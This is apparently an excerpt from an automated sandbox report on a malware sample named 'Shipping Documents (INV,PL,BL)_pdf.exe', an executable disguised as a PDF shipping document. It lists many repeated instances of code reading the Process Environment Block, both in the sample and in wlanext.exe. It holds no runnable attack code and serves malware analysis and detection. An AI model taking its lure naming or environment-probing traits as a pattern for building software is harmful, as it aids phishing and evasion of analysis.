      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E47740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E474015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C0050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E90AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4614FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E423540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AAD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B3D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3C7D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E478D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E42A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CB944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E3D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46E539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D1DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E426DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D35A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DFD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4341E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3A2D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E458DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DA185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CC182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BD5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4269A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4705AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4251BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00567C4F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00566CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005641FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_005689EB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_00568A85 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03533B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035C131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035853CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035303E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0353B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03532397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03511B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03534BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03594257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03509240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0354927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03505210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03505210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0350AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_035CAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03523A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03518A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_03544A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exe | Code function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352A229 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03532AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0351AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_035052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0352B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0350C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03509100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0353513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03524120 mov eax, dword ptr fs:[00000030h]
